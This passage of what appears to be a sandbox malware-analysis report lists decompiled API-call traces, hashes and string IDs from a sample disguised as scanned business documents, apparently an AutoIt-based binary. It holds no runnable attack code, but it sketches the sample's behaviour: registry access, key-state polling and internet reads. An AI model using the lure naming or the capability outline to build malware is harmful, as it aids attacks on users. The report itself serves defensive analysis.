                                                      • GetProcAddress.KERNEL32(?,DllGetClassObject), ref: 002E724D
                                                      • SetErrorMode.KERNEL32(00000000,?,?,?,?,?,?,?,?,?), ref: 002E72CF
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1657541035.0000000000281000.00000020.00000001.01000000.00000003.sdmp, Offset: 00280000, based on PE: true
                                                      • Associated: 00000000.00000002.1657524715.0000000000280000.00000002.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.1657587591.000000000031C000.00000002.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.1657587591.0000000000342000.00000002.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.1657624265.000000000034C000.00000004.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.1657649717.0000000000354000.00000002.00000001.01000000.00000003.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_280000_Scanned Docs from Emnes Metal Sdn Bhd_.jbxd
                                                      Similarity
                                                      • API ID: ErrorMode$AddressCreateInstanceProc
                                                      • String ID: DllGetClassObject
                                                      • API String ID: 753597075-1075368562
                                                      • Opcode ID: 2958ae6011c247c3a0f592e9f5a151b5f1fe3ecffc4db85f25cc11da7637c372
                                                      • Instruction ID: 07f6cf12604e29f084f8a3efe1279ae4f1f5a7d84b13324123500acbdbb69875
                                                      • Opcode Fuzzy Hash: 2958ae6011c247c3a0f592e9f5a151b5f1fe3ecffc4db85f25cc11da7637c372
                                                      • Instruction Fuzzy Hash: E641C071A94245EFDB15CF55C884A9A7BB9EF49310F5080AEFE099F20AD7B0DD50CBA0
                                                      APIs
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1657541035.0000000000281000.00000020.00000001.01000000.00000003.sdmp, Offset: 00280000, based on PE: true
                                                      • Associated: 00000000.00000002.1657524715.0000000000280000.00000002.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.1657587591.000000000031C000.00000002.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.1657587591.0000000000342000.00000002.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.1657624265.000000000034C000.00000004.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.1657649717.0000000000354000.00000002.00000001.01000000.00000003.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_280000_Scanned Docs from Emnes Metal Sdn Bhd_.jbxd
                                                      Similarity
                                                      • API ID: _wcslen
                                                      • String ID: HKEY_LOCAL_MACHINE$HKLM
                                                      • API String ID: 176396367-4004644295
                                                      • Opcode ID: 844e74d7db04003bd732783742373bcdeb898c70d13fddcdad831f00a7f5cdae
                                                      • Instruction ID: f442dd26a921f6132eec0d8894a05ca4c00705b3094d99179b3b6dc85d01445b
                                                      • Opcode Fuzzy Hash: 844e74d7db04003bd732783742373bcdeb898c70d13fddcdad831f00a7f5cdae
                                                      • Instruction Fuzzy Hash: BD312B33B2216A4BCB23EF6CC8701BF33915BA1750B175219EC456B2C5EA70CD54C7A0
                                                      APIs
                                                      • SendMessageW.USER32(00000000,00000467,00000000,?), ref: 00312F8D
                                                      • LoadLibraryW.KERNEL32(?), ref: 00312F94
                                                      • SendMessageW.USER32(?,00000467,00000000,00000000), ref: 00312FA9
                                                      • DestroyWindow.USER32(?), ref: 00312FB1
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1657541035.0000000000281000.00000020.00000001.01000000.00000003.sdmp, Offset: 00280000, based on PE: true
                                                      • Associated: 00000000.00000002.1657524715.0000000000280000.00000002.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.1657587591.000000000031C000.00000002.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.1657587591.0000000000342000.00000002.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.1657624265.000000000034C000.00000004.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.1657649717.0000000000354000.00000002.00000001.01000000.00000003.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_280000_Scanned Docs from Emnes Metal Sdn Bhd_.jbxd
                                                      Similarity
                                                      • API ID: MessageSend$DestroyLibraryLoadWindow
                                                      • String ID: SysAnimate32
                                                      • API String ID: 3529120543-1011021900
                                                      • Opcode ID: 80662d8cb25452d28577375bbc1674e3b18a39f7550f62e1bc64333ccb98a324
                                                      • Instruction ID: 2763c89bde61ed1e4298c7fd7e4eb101837241ceaa11e461abe39452c6f3d458
                                                      • Opcode Fuzzy Hash: 80662d8cb25452d28577375bbc1674e3b18a39f7550f62e1bc64333ccb98a324
                                                      • Instruction Fuzzy Hash: EC21DC71200209ABEB1A4F64DC84EFB77BDEB5D324F114218F950D60A0C331DCA29760
                                                      APIs
                                                      • GetModuleHandleExW.KERNEL32(00000000,mscoree.dll,00000000,?,?,?,002A4D1E,002B28E9,?,002A4CBE,002B28E9,003488B8,0000000C,002A4E15,002B28E9,00000002), ref: 002A4D8D
                                                      • GetProcAddress.KERNEL32(00000000,CorExitProcess), ref: 002A4DA0
                                                      • FreeLibrary.KERNEL32(00000000,?,?,?,002A4D1E,002B28E9,?,002A4CBE,002B28E9,003488B8,0000000C,002A4E15,002B28E9,00000002,00000000), ref: 002A4DC3
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1657541035.0000000000281000.00000020.00000001.01000000.00000003.sdmp, Offset: 00280000, based on PE: true
                                                      • Associated: 00000000.00000002.1657524715.0000000000280000.00000002.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.1657587591.000000000031C000.00000002.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.1657587591.0000000000342000.00000002.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.1657624265.000000000034C000.00000004.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.1657649717.0000000000354000.00000002.00000001.01000000.00000003.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_280000_Scanned Docs from Emnes Metal Sdn Bhd_.jbxd
                                                      Similarity
                                                      • API ID: AddressFreeHandleLibraryModuleProc
                                                      • String ID: CorExitProcess$mscoree.dll
                                                      • API String ID: 4061214504-1276376045
                                                      • Opcode ID: 3a5325152bbd00a09edd0507e0610b31aacc21fd4ecdcdbb0d7c0edd64689abc
                                                      • Instruction ID: 3aff07ce1c7814c44e8ae3bc112df5a492701ed3e9acc499b7942ee1624d7a21
                                                      • Opcode Fuzzy Hash: 3a5325152bbd00a09edd0507e0610b31aacc21fd4ecdcdbb0d7c0edd64689abc
                                                      • Instruction Fuzzy Hash: ABF0C234AA0218FBDB129F94DC49BEDBFB8EF48711F0040A4F905A2260CF709E50CB90
                                                      APIs
                                                      • LoadLibraryA.KERNEL32 ref: 002DD3AD
                                                      • GetProcAddress.KERNEL32(00000000,GetSystemWow64DirectoryW), ref: 002DD3BF
                                                      • FreeLibrary.KERNEL32(00000000), ref: 002DD3E5
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1657541035.0000000000281000.00000020.00000001.01000000.00000003.sdmp, Offset: 00280000, based on PE: true
                                                      • Associated: 00000000.00000002.1657524715.0000000000280000.00000002.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.1657587591.000000000031C000.00000002.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.1657587591.0000000000342000.00000002.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.1657624265.000000000034C000.00000004.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.1657649717.0000000000354000.00000002.00000001.01000000.00000003.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_280000_Scanned Docs from Emnes Metal Sdn Bhd_.jbxd
                                                      Similarity
                                                      • API ID: Library$AddressFreeLoadProc
                                                      • String ID: GetSystemWow64DirectoryW$X64
                                                      • API String ID: 145871493-2590602151
                                                      • Opcode ID: 51e5cf0ca6218710ebebf0051292c9a289f2b3417755ca4dd3cf2337b1747447
                                                      • Instruction ID: 325da2bd26bd57aa0eda9ea98673c6b33bae3f33f1605c4f5f45e5f66b0079eb
                                                      • Opcode Fuzzy Hash: 51e5cf0ca6218710ebebf0051292c9a289f2b3417755ca4dd3cf2337b1747447
                                                      • Instruction Fuzzy Hash: 38F05C344F5E12ABD7B71B208C1CD997324AF14701F5594A7FC06E2215D770CCA08A81
                                                      APIs
                                                      • LoadLibraryA.KERNEL32(kernel32.dll,?,?,00284EDD,?,00351418,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?,?,?,00000000), ref: 00284E9C
                                                      • GetProcAddress.KERNEL32(00000000,Wow64DisableWow64FsRedirection), ref: 00284EAE
                                                      • FreeLibrary.KERNEL32(00000000,?,?,00284EDD,?,00351418,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?,?,?,00000000), ref: 00284EC0
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1657541035.0000000000281000.00000020.00000001.01000000.00000003.sdmp, Offset: 00280000, based on PE: true
                                                      • Associated: 00000000.00000002.1657524715.0000000000280000.00000002.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.1657587591.000000000031C000.00000002.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.1657587591.0000000000342000.00000002.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.1657624265.000000000034C000.00000004.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.1657649717.0000000000354000.00000002.00000001.01000000.00000003.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_280000_Scanned Docs from Emnes Metal Sdn Bhd_.jbxd
                                                      Similarity
                                                      • API ID: Library$AddressFreeLoadProc
                                                      • String ID: Wow64DisableWow64FsRedirection$kernel32.dll
                                                      • API String ID: 145871493-3689287502
                                                      • Opcode ID: 16d158510ebe3f048cc2769a894685a65a405215835bdbbc196feda461ded069
                                                      • Instruction ID: f4392bc0279d85ce606a432c2abbda82851e968ce8886327c24b215026870e7e
                                                      • Opcode Fuzzy Hash: 16d158510ebe3f048cc2769a894685a65a405215835bdbbc196feda461ded069
                                                      • Instruction Fuzzy Hash: 35E0CD39AB35236BD2333F256C18BDFA69CAF85F62F055125FC01E3140DB60CD1141A0
                                                      APIs
                                                      • LoadLibraryA.KERNEL32(kernel32.dll,?,?,002C3CDE,?,00351418,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?,?,?,00000000), ref: 00284E62
                                                      • GetProcAddress.KERNEL32(00000000,Wow64RevertWow64FsRedirection), ref: 00284E74
                                                      • FreeLibrary.KERNEL32(00000000,?,?,002C3CDE,?,00351418,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?,?,?,00000000), ref: 00284E87
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1657541035.0000000000281000.00000020.00000001.01000000.00000003.sdmp, Offset: 00280000, based on PE: true
                                                      • Associated: 00000000.00000002.1657524715.0000000000280000.00000002.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.1657587591.000000000031C000.00000002.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.1657587591.0000000000342000.00000002.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.1657624265.000000000034C000.00000004.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.1657649717.0000000000354000.00000002.00000001.01000000.00000003.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_280000_Scanned Docs from Emnes Metal Sdn Bhd_.jbxd
                                                      Similarity
                                                      • API ID: Library$AddressFreeLoadProc
                                                      • String ID: Wow64RevertWow64FsRedirection$kernel32.dll
                                                      • API String ID: 145871493-1355242751
                                                      • Opcode ID: fe0c6d0d793b9904aca06dd4ae6da964b7f925e5221a8fab5de607d07e0e09f9
                                                      • Instruction ID: 50e33c5f83ae63a76e373d1142d4fd4a3d18809dd15606a653b399383cf4bc9e
                                                      • Opcode Fuzzy Hash: fe0c6d0d793b9904aca06dd4ae6da964b7f925e5221a8fab5de607d07e0e09f9
                                                      • Instruction Fuzzy Hash: 73D012395A36236756233F256C18DCB6A1CAF89B517059525F905E6154CF60CD1186D0
                                                      APIs
                                                      • GetCurrentProcessId.KERNEL32 ref: 0030A427
                                                      • OpenProcess.KERNEL32(00000410,00000000,00000000), ref: 0030A435
                                                      • GetProcessIoCounters.KERNEL32(00000000,?), ref: 0030A468
                                                      • CloseHandle.KERNEL32(?), ref: 0030A63D
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1657541035.0000000000281000.00000020.00000001.01000000.00000003.sdmp, Offset: 00280000, based on PE: true
                                                      • Associated: 00000000.00000002.1657524715.0000000000280000.00000002.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.1657587591.000000000031C000.00000002.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.1657587591.0000000000342000.00000002.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.1657624265.000000000034C000.00000004.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.1657649717.0000000000354000.00000002.00000001.01000000.00000003.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_280000_Scanned Docs from Emnes Metal Sdn Bhd_.jbxd
                                                      Similarity
                                                      • API ID: Process$CloseCountersCurrentHandleOpen
                                                      • String ID:
                                                      • API String ID: 3488606520-0
                                                      • Opcode ID: d040b8ce3aeb6c81efdd19da1a982bc6866a1191b681ab5d71d66ecc6c5fd72d
                                                      • Instruction ID: 9984f56a8f31cddb03aa4f3db35ac34b55d006cf25d903fa8dba6c5f6c5c6c5b
                                                      • Opcode Fuzzy Hash: d040b8ce3aeb6c81efdd19da1a982bc6866a1191b681ab5d71d66ecc6c5fd72d
                                                      • Instruction Fuzzy Hash: 6DA1E075615700AFE720EF24D896F2AB7E5AF84714F14881DF59A8B2D2C7B0EC108B92
                                                      APIs
                                                        • Part of subcall function 002EDDE0: GetFullPathNameW.KERNEL32(00000000,00007FFF,?,?,?,?,?,?,002ECF22,?), ref: 002EDDFD
                                                        • Part of subcall function 002EDDE0: GetFullPathNameW.KERNEL32(?,00007FFF,?,?,?,?,?,002ECF22,?), ref: 002EDE16
                                                        • Part of subcall function 002EE199: GetFileAttributesW.KERNEL32(?,002ECF95), ref: 002EE19A
                                                      • lstrcmpiW.KERNEL32(?,?), ref: 002EE473
                                                      • MoveFileW.KERNEL32(?,?), ref: 002EE4AC
                                                      • _wcslen.LIBCMT ref: 002EE5EB
                                                      • _wcslen.LIBCMT ref: 002EE603
                                                      • SHFileOperationW.SHELL32(?,?,?,?,?,?), ref: 002EE650
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1657541035.0000000000281000.00000020.00000001.01000000.00000003.sdmp, Offset: 00280000, based on PE: true
                                                      • Associated: 00000000.00000002.1657524715.0000000000280000.00000002.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.1657587591.000000000031C000.00000002.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.1657587591.0000000000342000.00000002.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.1657624265.000000000034C000.00000004.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.1657649717.0000000000354000.00000002.00000001.01000000.00000003.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_280000_Scanned Docs from Emnes Metal Sdn Bhd_.jbxd
                                                      Similarity
                                                      • API ID: File$FullNamePath_wcslen$AttributesMoveOperationlstrcmpi
                                                      • String ID:
                                                      • API String ID: 3183298772-0
                                                      • Opcode ID: ad14b895dd10e369df9221176b5285c4e98b61f8cb220c35821f2d627dd9aa0b
                                                      • Instruction ID: a8dd2c37ef342c7c1495c55957b3340864034f4f6dda7e995986685f6eb4e5ef
                                                      • Opcode Fuzzy Hash: ad14b895dd10e369df9221176b5285c4e98b61f8cb220c35821f2d627dd9aa0b
                                                      • Instruction Fuzzy Hash: E051C6B24583855BCB24EF90CC819EFB3ECAF85340F40491EF689D3191EF74A5988B66
                                                      APIs
                                                        • Part of subcall function 00289CB3: _wcslen.LIBCMT ref: 00289CBD
                                                        • Part of subcall function 0030C998: CharUpperBuffW.USER32(?,?,?,?,?,?,?,0030B6AE,?,?), ref: 0030C9B5
                                                        • Part of subcall function 0030C998: _wcslen.LIBCMT ref: 0030C9F1
                                                        • Part of subcall function 0030C998: _wcslen.LIBCMT ref: 0030CA68
                                                        • Part of subcall function 0030C998: _wcslen.LIBCMT ref: 0030CA9E
                                                      • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 0030BAA5
                                                      • RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?), ref: 0030BB00
                                                      • RegEnumKeyExW.ADVAPI32(?,-00000001,?,?,00000000,00000000,00000000,?), ref: 0030BB63
                                                      • RegCloseKey.ADVAPI32(?,?), ref: 0030BBA6
                                                      • RegCloseKey.ADVAPI32(00000000), ref: 0030BBB3
                                                      Similarity
                                                      • API ID: _wcslen$Close$BuffCharConnectEnumOpenRegistryUpper
                                                      • String ID:
                                                      • API String ID: 826366716-0
                                                      • Opcode ID: 86c032474946ca27ff9fade579d00d5fd27dcca705fa5f27de8b32242b7caae7
                                                      • Instruction ID: 08677434f8f96f7e473712555591d14666836fe11695f7c763a10be6afcd1de3
                                                      • Opcode Fuzzy Hash: 86c032474946ca27ff9fade579d00d5fd27dcca705fa5f27de8b32242b7caae7
                                                      • Instruction Fuzzy Hash: 4361BF31219241AFD315DF24C4A0E2ABBE9FF88308F54855DF4998B2E2DB31ED45CB92
                                                      APIs
                                                      • VariantInit.OLEAUT32(?), ref: 002E8BCD
                                                      • VariantClear.OLEAUT32 ref: 002E8C3E
                                                      • VariantClear.OLEAUT32 ref: 002E8C9D
                                                      • VariantClear.OLEAUT32(?), ref: 002E8D10
                                                      • VariantChangeType.OLEAUT32(?,?,00000000,00000013), ref: 002E8D3B
                                                      Similarity
                                                      • API ID: Variant$Clear$ChangeInitType
                                                      • String ID:
                                                      • API String ID: 4136290138-0
                                                      • Opcode ID: 8d60ec96a562b97807cb53693ee5eeff1883617c308729c726e3cbfe581f0a80
                                                      • Instruction ID: ec43860658d1b0cee7b11e7066a41a49b5220a7ababc02d9c43aa64298732bfa
                                                      • Opcode Fuzzy Hash: 8d60ec96a562b97807cb53693ee5eeff1883617c308729c726e3cbfe581f0a80
                                                      • Instruction Fuzzy Hash: 6B517B75A10219DFCB14CF69C884AAAB7F9FF8D310F118559E949DB350E730E911CB90
                                                      APIs
                                                      • GetPrivateProfileSectionW.KERNEL32(00000003,?,00007FFF,?), ref: 002F8BAE
                                                      • GetPrivateProfileSectionW.KERNEL32(?,00000003,00000003,?), ref: 002F8BDA
                                                      • WritePrivateProfileSectionW.KERNEL32(?,?,?), ref: 002F8C32
                                                      • WritePrivateProfileStringW.KERNEL32(00000003,00000000,00000000,?), ref: 002F8C57
                                                      • WritePrivateProfileStringW.KERNEL32(00000000,00000000,00000000,?), ref: 002F8C5F
                                                      Similarity
                                                      • API ID: PrivateProfile$SectionWrite$String
                                                      • String ID:
                                                      • API String ID: 2832842796-0
                                                      • Opcode ID: af7ccfad21df58da176273f1bd0c7dc52321550cfcd208caa2e38ccd7602deb6
                                                      • Instruction ID: c745dbe2ac0c2a94784eb46fabbb937507228931d456bab1cfcfdff1c4ccc61e
                                                      • Opcode Fuzzy Hash: af7ccfad21df58da176273f1bd0c7dc52321550cfcd208caa2e38ccd7602deb6
                                                      • Instruction Fuzzy Hash: 9C514D35A102199FDB05DF64C880A6DBBF5FF48314F188459E949AB3A2CB35ED61CFA0
                                                      APIs
                                                      • LoadLibraryW.KERNEL32(?,00000000,?), ref: 00308F40
                                                      • GetProcAddress.KERNEL32(00000000,?), ref: 00308FD0
                                                      • GetProcAddress.KERNEL32(00000000,00000000), ref: 00308FEC
                                                      • GetProcAddress.KERNEL32(00000000,?), ref: 00309032
                                                      • FreeLibrary.KERNEL32(00000000), ref: 00309052
                                                        • Part of subcall function 0029F6C9: WideCharToMultiByte.KERNEL32(00000000,00000000,?,?,00000000,00000000,00000000,00000000,?,00000000,?,?,?,002F1043,?,753CE610), ref: 0029F6E6
                                                        • Part of subcall function 0029F6C9: WideCharToMultiByte.KERNEL32(00000000,00000000,?,?,00000000,002DFA64,00000000,00000000,?,?,002F1043,?,753CE610,?,002DFA64), ref: 0029F70D
                                                      Similarity
                                                      • API ID: AddressProc$ByteCharLibraryMultiWide$FreeLoad
                                                      • String ID:
                                                      • API String ID: 666041331-0
                                                      • Opcode ID: b9deb77a06a3013878003f5766a2173cba678a78bf3076a00311b888efc09d77
                                                      • Instruction ID: be8ed860bd403ca3044599c2c8d31dd7832d35fe852900ee1b3f6add01970568
                                                      • Opcode Fuzzy Hash: b9deb77a06a3013878003f5766a2173cba678a78bf3076a00311b888efc09d77
                                                      • Instruction Fuzzy Hash: 47515E38602205DFC712EF68C4949ADBBF5FF49314B0980A9E8459B7A2DB31ED85CF90
                                                      APIs
                                                      • SetWindowLongW.USER32(00000002,000000F0,?), ref: 00316C33
                                                      • SetWindowLongW.USER32(?,000000EC,?), ref: 00316C4A
                                                      • SendMessageW.USER32(00000002,00001036,00000000,?), ref: 00316C73
                                                      • ShowWindow.USER32(00000002,00000000,00000002,00000002,?,?,?,?,?,?,?,002FAB79,00000000,00000000), ref: 00316C98
                                                      • SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000000,00000027,00000002,?,00000001,00000002,00000002,?,?,?), ref: 00316CC7
                                                      Similarity
                                                      • API ID: Window$Long$MessageSendShow
                                                      • String ID:
                                                      • API String ID: 3688381893-0
                                                      • Opcode ID: 4a9a385921c50ed1482c149e6742d4d2bd9e6abbea2abbcb0cc5a745da642f1c
                                                      • Instruction ID: 28cf186a330eee53eaf14d9a3201585d3c4331830938c3274d23534313c37480
                                                      • Opcode Fuzzy Hash: 4a9a385921c50ed1482c149e6742d4d2bd9e6abbea2abbcb0cc5a745da642f1c
                                                      • Instruction Fuzzy Hash: 6D41E835604104AFD72ACFA8CC56FE97BA9EB0D350F164268F895A72E0C371ED91CAD0
                                                      APIs
                                                      Similarity
                                                      • API ID: _free
                                                      • String ID:
                                                      • API String ID: 269201875-0
                                                      • Opcode ID: 9838de0dcc59470023c632d18c65557947c5df01d26bb9966f7f8fcd722dbf32
                                                      • Instruction ID: e8322df2d3f4164c8594b784cac9176fd56070e559e6d519068557cb2c29e258
                                                      • Opcode Fuzzy Hash: 9838de0dcc59470023c632d18c65557947c5df01d26bb9966f7f8fcd722dbf32
                                                      • Instruction Fuzzy Hash: 9341E232A20300EFCB24DF78C880A9DB7A5EF89354F154568E515EB352DB31ED15CB90
                                                      APIs
                                                      • GetCursorPos.USER32(?), ref: 00299141
                                                      • ScreenToClient.USER32(00000000,?), ref: 0029915E
                                                      • GetAsyncKeyState.USER32(00000001), ref: 00299183
                                                      • GetAsyncKeyState.USER32(00000002), ref: 0029919D
                                                      Similarity
                                                      • API ID: AsyncState$ClientCursorScreen
                                                      • String ID:
                                                      • API String ID: 4210589936-0
                                                      • Opcode ID: 092579ec0bead5eb89a0a6b56bce19d2030a101440c60bd54e7fe8ab96084734
                                                      • Instruction ID: 30af34ed3a761d5162359ef916ac24f3358b0f997e79e3e695eefe1027599b14
                                                      • Opcode Fuzzy Hash: 092579ec0bead5eb89a0a6b56bce19d2030a101440c60bd54e7fe8ab96084734
                                                      • Instruction Fuzzy Hash: 07415E3191851BABDF199F68C844BEEB775FF09320F20831AE429A62D0D7745DA0DB91
                                                      APIs
                                                      • GetInputState.USER32 ref: 002F38CB
                                                      • TranslateAcceleratorW.USER32(?,00000000,?), ref: 002F3922
                                                      • TranslateMessage.USER32(?), ref: 002F394B
                                                      • DispatchMessageW.USER32(?), ref: 002F3955
                                                      • PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 002F3966
                                                      Similarity
                                                      • API ID: Message$Translate$AcceleratorDispatchInputPeekState
                                                      • String ID:
                                                      • API String ID: 2256411358-0
                                                      • Opcode ID: ce137f7c9329dc4344456b19096ef6427d8cb99ffb077a6143f6d995cbe88dc6
                                                      • Instruction ID: 1c1a2aa250ff1bf43b9e64d566db6a95d3eb991c771c4dd852507deb8710b710
                                                      • Opcode Fuzzy Hash: ce137f7c9329dc4344456b19096ef6427d8cb99ffb077a6143f6d995cbe88dc6
                                                      • Instruction Fuzzy Hash: C031C67057434B9EEB36CF359858BB6B7ACAB05381F04057DE662821A0E3F49A94CB51
                                                      APIs
                                                      • InternetQueryDataAvailable.WININET(?,?,00000000,00000000), ref: 002FCF38
                                                      • InternetReadFile.WININET(?,00000000,?,?), ref: 002FCF6F
                                                      • GetLastError.KERNEL32(?,00000000,?,?,?,002FC21E,00000000), ref: 002FCFB4
                                                      • SetEvent.KERNEL32(?,?,00000000,?,?,?,002FC21E,00000000), ref: 002FCFC8
                                                      • SetEvent.KERNEL32(?,?,00000000,?,?,?,002FC21E,00000000), ref: 002FCFF2
                                                      Similarity
                                                      • API ID: EventInternet$AvailableDataErrorFileLastQueryRead
                                                      • String ID:
                                                      • API String ID: 3191363074-0
                                                      • Opcode ID: a5393a81d1f34c7843fbe3a9b1383ccdefa6850404ffe52882aeccc28ddc3f52
                                                      • Instruction ID: b981d3a3364210eede3b79fc6a756bf8267d2cd047ea994a57cdcd86b82cba8b
                                                      • Opcode Fuzzy Hash: a5393a81d1f34c7843fbe3a9b1383ccdefa6850404ffe52882aeccc28ddc3f52
                                                      • Instruction Fuzzy Hash: 10317F7152020EAFDB20DFA5CA849BBFBF9EB04390B20853EF606D2550D730AE51DB60
                                                      APIs
                                                      • GetWindowRect.USER32(?,?), ref: 002E1915
                                                      • PostMessageW.USER32(00000001,00000201,00000001), ref: 002E19C1
                                                      • Sleep.KERNEL32(00000000,?,?,?), ref: 002E19C9
                                                      • PostMessageW.USER32(00000001,00000202,00000000), ref: 002E19DA
                                                      • Sleep.KERNEL32(00000000,?,?,?,?), ref: 002E19E2
                                                      Similarity
                                                      • API ID: MessagePostSleep$RectWindow
                                                      • String ID:
                                                      • API String ID: 3382505437-0
                                                      • Opcode ID: 798b64674936bfedfe0a287ae82cf3a9e8b8a7ef57c8f37c3ea758d30b6931a6
                                                      • Instruction ID: d8212bcba21d8a73a0791e096a922e43ef3a392376b3d5a3d1e67daac38692dd
                                                      • Opcode Fuzzy Hash: 798b64674936bfedfe0a287ae82cf3a9e8b8a7ef57c8f37c3ea758d30b6931a6
                                                      • Instruction Fuzzy Hash: 9231D471A50259EFCB00CFA9CD99ADE7BB5EB08315F108225F921A72D1C7709D64CB90
                                                      APIs
                                                      • SendMessageW.USER32(?,00001053,000000FF,?), ref: 00315745
                                                      • SendMessageW.USER32(?,00001074,?,00000001), ref: 0031579D
                                                      • _wcslen.LIBCMT ref: 003157AF
                                                      • _wcslen.LIBCMT ref: 003157BA
                                                      • SendMessageW.USER32(?,00001002,00000000,?), ref: 00315816
                                                      Similarity
                                                      • API ID: MessageSend$_wcslen
                                                      • String ID:
                                                      • API String ID: 763830540-0
                                                      • Opcode ID: 87d1103dd731ef0adac65fafcf72df8cd24a510ae1f04003b4f821e1c5847e81
                                                      • Instruction ID: 6864165e9a181c62f5da5161911a7200c332999f479595867df4346ba5cc9b79
                                                      • Opcode Fuzzy Hash: 87d1103dd731ef0adac65fafcf72df8cd24a510ae1f04003b4f821e1c5847e81
                                                      • Instruction Fuzzy Hash: C421A231904618DADB229FA1CC85AEEB7BCFF88325F108216E929EA1C0D77089C5CF50
                                                      APIs
                                                      • IsWindow.USER32(00000000), ref: 00300951
                                                      • GetForegroundWindow.USER32 ref: 00300968
                                                      • GetDC.USER32(00000000), ref: 003009A4
                                                      • GetPixel.GDI32(00000000,?,00000003), ref: 003009B0
                                                      • ReleaseDC.USER32(00000000,00000003), ref: 003009E8
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1657541035.0000000000281000.00000020.00000001.01000000.00000003.sdmp, Offset: 00280000, based on PE: true
                                                      • Associated: 00000000.00000002.1657524715.0000000000280000.00000002.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.1657587591.000000000031C000.00000002.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.1657587591.0000000000342000.00000002.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.1657624265.000000000034C000.00000004.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.1657649717.0000000000354000.00000002.00000001.01000000.00000003.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_280000_Scanned Docs from Emnes Metal Sdn Bhd_.jbxd
                                                      Similarity
                                                      • API ID: Window$ForegroundPixelRelease
                                                      • String ID:
                                                      • API String ID: 4156661090-0
                                                      • Opcode ID: f4e42aa75444fa2ed50e8a63a1a0144f0cd5759d880e3e5082f332a39c4feb42
                                                      • Instruction ID: a7c3cc3b2362c57fc5fc250025c43d278496a458b9a0b6b1667dfe1b9a82df7f
                                                      • Opcode Fuzzy Hash: f4e42aa75444fa2ed50e8a63a1a0144f0cd5759d880e3e5082f332a39c4feb42
                                                      • Instruction Fuzzy Hash: 41218E79610204AFD705EF65D894AAEBBE9EF48740F04807DE94A977A2CB70AC14CF50
                                                      APIs
                                                      • GetEnvironmentStringsW.KERNEL32 ref: 002BCDC6
